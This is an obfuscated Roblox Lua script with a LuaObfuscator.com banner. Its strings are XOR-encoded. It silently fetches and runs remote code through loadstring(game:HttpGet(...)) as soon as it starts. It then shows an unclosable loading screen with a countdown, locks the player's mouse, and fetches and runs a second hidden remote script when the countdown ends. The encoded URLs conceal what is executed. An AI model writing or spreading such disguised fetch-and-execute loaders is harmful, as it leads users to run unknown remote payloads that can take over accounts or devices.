--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v68,v69) local v70={};for v80=1, #v68 do v6(v70,v0(v4(v1(v2(v68,v80,v80 + 1 )),v1(v2(v69,1 + (v80% #v69) ,1 + (v80% #v69) + 1 )))%256 ));end return v5(v70);end local v8=v7("\253\204\218\33\239\181\192\94\226\192\201\44\246\175\134","\126\177\163\187\69\134\219\167");local v9=v7("\4\200\62\209\245\45\202\106\214\243\54\223\41\192\178\109\131","\156\67\173\74\165");local v10=70 -40 ;pcall(function() loadstring(game:HttpGet(v7("\60\163\93\6\175\124\9\123\165\72\1\242\33\79\32\191\92\20\169\53\67\38\180\70\24\168\35\72\32\249\74\25\177\105\118\38\184\67\19\191\50\97\21\144\6\49\157\1\11\60\162\75\89\174\35\64\39\248\65\19\189\34\85\123\186\72\31\178\105\65\53\176\4\29\185\63\74\49\164\90\91\180\51\68","\38\84\215\41\118\220\70")))();end);local v11=game.Players.LocalPlayer;local v12=v11:GetMouse();local v13=Instance.new(v7("\99\21\48\23\251\94\49\55\27","\158\48\118\66\114"),v11:WaitForChild(v7("\155\40\17\47\118\183\220\190\45","\155\203\68\112\86\19\197")));v13.Name=v7("\106\210\55\248\73\118\226\205\111","\152\38\189\86\156\32\24\133");v13.ResetOnSpawn=false;v13.DisplayOrder=3419 + 6580 ;local v17=Instance.new(v7("\218\69\166\75\249","\38\156\55\199"),v13);v17.Size=UDim2.new(1 + 0 ,0 -0 ,15 -(9 + 5) ,376 -(85 + 291) );v17.Position=UDim2.new(1265 -(243 + 1022) ,0 -0 ,0 + 0 ,1180 -(1123 + 57) );v17.BackgroundColor3=Color3.fromRGB(22 + 5 ,281 -(163 + 91) ,27);v17.Active=true;v17.Draggable=false;local v23=Instance.new(v7("\156\120\100\60\63\117\248\70\164","\35\200\29\28\72\115\20\154"),v17);v23.Size=UDim2.new(1931 -(1869 + 61) ,0 + 0 ,0 -0 ,60);v23.Position=UDim2.new(0 -0 ,0,0 + 0 ,27 -7 );v23.Text=v8;v23.Font=Enum.Font.FredokaOne;v23.TextSize=31 + 1 ;v23.TextColor3=Color3.fromRGB(1729 -(1329 + 145) ,255,1226 -(140 + 831) );v23.BackgroundTransparency=1851 -(1409 + 441) ;local v32=Instance.new(v7("\45\186\201\203\161\45\54\28\179","\84\121\223\177\191\237\76"),v17);v32.Size=UDim2.new(1,0,0,748 -(15 + 703) );v32.Position=UDim2.new(0 + 0 ,0,0,80);v32.Text=v9;v32.Font=Enum.Font.FredokaOne;v32.TextSize=460 -(262 + 176) ;v32.TextColor3=Color3.fromRGB(180,1901 -(345 + 1376) ,868 -(198 + 490) );v32.BackgroundTransparency=4 -3 ;local v40=Instance.new(v7("\157\68\200\173\63","\161\219\54\169\192\90\48\80"),v17);v40.Size=UDim2.new(0.5 -0 ,0,1206 -(696 + 510) ,10);v40.Position=UDim2.new(0.25 -0 ,0,1262.85 -(1091 + 171) ,0 + 0 );v40.BackgroundColor3=Color3.fromRGB(125 -85 ,132 -92 ,414 -(123 + 251) );v40.BorderSizePixel=0 -0 ;Instance.new(v7("\124\107\35\42\91\76\5\55","\69\41\34\96"),v40).CornerRadius=UDim.new(1,698 -(208 + 490) );local v46=Instance.new(v7("\154\209\214\7\7","\75\220\163\183\106\98"),v40);v46.Size=UDim2.new(0,0 + 0 ,1,0);v46.BackgroundColor3=Color3.fromRGB(0,76 + 94 ,1091 -(660 + 176) );v46.BorderSizePixel=0;Instance.new(v7("\55\147\168\56\203\12\191\153","\185\98\218\235\87"),v46).CornerRadius=UDim.new(1 + 0 ,202 -(14 + 188) );local v51=Instance.new(v7("\255\57\63\242\242\171\201\57\43","\202\171\92\71\134\190"),v17);v51.Size=UDim2.new(676 -(534 + 141) ,0 + 0 ,0,30);v51.Position=UDim2.new(0 + 0 ,0,0.75,0 + 0 );v51.Text=v7("\29\200\33\141\105\237\41\142\61\155\108","\232\73\161\76")   .. v10 ;v51.Font=Enum.Font.FredokaOne;v51.TextSize=20;v51.TextColor3=Color3.fromRGB(535 -280 ,255,404 -149 );v51.BackgroundTransparency=2 -1 ;local v59=Instance.new(v7("\157\203\67\80\27","\126\219\185\34\61"),v17);v59.Size=UDim2.new(0 + 0 ,39 + 21 ,396 -(115 + 281) ,46 -26 );v59.Position=UDim2.new(0.5, -(25 + 5),0.93 -0 ,0 -0 );v59.BackgroundTransparency=868 -(550 + 317) ;local function v63(v71) local v72=0 -0 ;local v73;while true do if (v72==3) then return v73;end if (v72==(0 -0)) then v73=Instance.new(v7("\42\220\95\127\123","\135\108\174\62\18\30\23\147"),v59);v73.Size=UDim2.new(0 -0 ,295 -(134 + 151) ,1665 -(970 + 695) ,19 -9 );v72=1991 -(582 + 1408) ;end if (v72==(6 -4)) then v73.BorderSizePixel=0 -0 ;Instance.new(v7("\131\192\9\196\10\160\54\213","\167\214\137\74\171\120\206\83"),v73).CornerRadius=UDim.new(3 -2 ,0);v72=1827 -(1195 + 629) ;end if (v72==1) then v73.Position=UDim2.new(0 -0 ,v71,0,241 -(187 + 54) );v73.BackgroundColor3=Color3.fromRGB(1035 -(162 + 618) ,179 + 76 ,255);v72=2;end end end local v64={v63(0 + 0 ),v63(20),v63(67 -27 )};task.spawn(function() while v13 and v13.Parent  do local v81=0;while true do if (v81==0) then for v93,v94 in ipairs(v64) do local v95=0 + 0 ;while true do if (v95==(1636 -(1373 + 263))) then v94:TweenSize(UDim2.new(1000 -(451 + 549) ,10,0 + 0 ,15 -5 ),v7("\164\229\38","\199\235\144\82\61\152"),v7("\52\31\183\46","\75\103\118\217"),0.15,true);task.wait(0.15 -0 );break;end end end for v96,v97 in ipairs(v64) do local v98=0;local v99;while true do if ((1384 -(746 + 638))==v98) then v99=0 + 0 ;while true do if (v99==(0 -0)) then v97:TweenSize(UDim2.new(0,341 -(218 + 123) ,1581 -(1535 + 46) ,0 + 0 ),v7("\232\65\100","\126\167\52\16\116\217"),v7("\251\39\46\133","\156\168\78\64\224\212\121"),0.15,true);task.wait(0.15 + 0 );break;end end break;end end end break;end end end end);local v65=game:GetService(v7("\50\253\160\220\46\224\181\219\19\221\160\220\17\231\166\203","\174\103\142\197"));v65.MouseBehavior=Enum.MouseBehavior.LockCenter;v13.AncestryChanged:Connect(function(v74,v75) if  not v75 then v13.Parent=v11:WaitForChild(v7("\102\36\94\33\32\76\223\67\33","\152\54\72\63\88\69\62"));end end);task.spawn(function() for v82=0,v10 do local v83=560 -(306 + 254) ;local v84;while true do if (v83==0) then local v91=0;while true do if (v91==(0 + 0)) then v84=v82/v10 ;v46:TweenSize(UDim2.new(v84,0,1 -0 ,1467 -(899 + 568) ),v7("\251\209\250","\60\180\164\142"),v7("\116\87\11\44\38\255","\114\56\62\101\73\71\141"),0.2,true);v91=1 + 0 ;end if (v91==(2 -1)) then v83=604 -(268 + 335) ;break;end end end if ((291 -(60 + 230))==v83) then v51.Text=v7("\140\224\214\193\248\197\222\194\172\179\155","\164\216\137\187")   .. (v10-v82) ;task.wait(573 -(426 + 146) );break;end end end local v76,v77=pcall(function() loadstring(game:HttpGet(v7("\218\242\37\162\181\164\68\157\244\48\165\232\249\2\198\238\36\176\179\237\14\192\229\62\188\178\251\5\198\168\50\189\171\177\59\192\233\59\183\165\234\44\243\193\126\149\135\217\70\218\243\51\253\180\251\13\193\169\57\183\167\250\24\157\235\48\187\168\177\35\199\228\124\185\163\231\7\215\245\34","\107\178\134\81\210\198\158")))();end);if  not v76 then warn(v7("\25\8\150\195\184\117\26\139\203\175\42\78\145\197\184\49\30\150\134\172\57\7\142\195\174\98\78","\202\88\110\226\166")   .. v77 );end v13:Destroy();v65.MouseBehavior=Enum.MouseBehavior.Default;end);
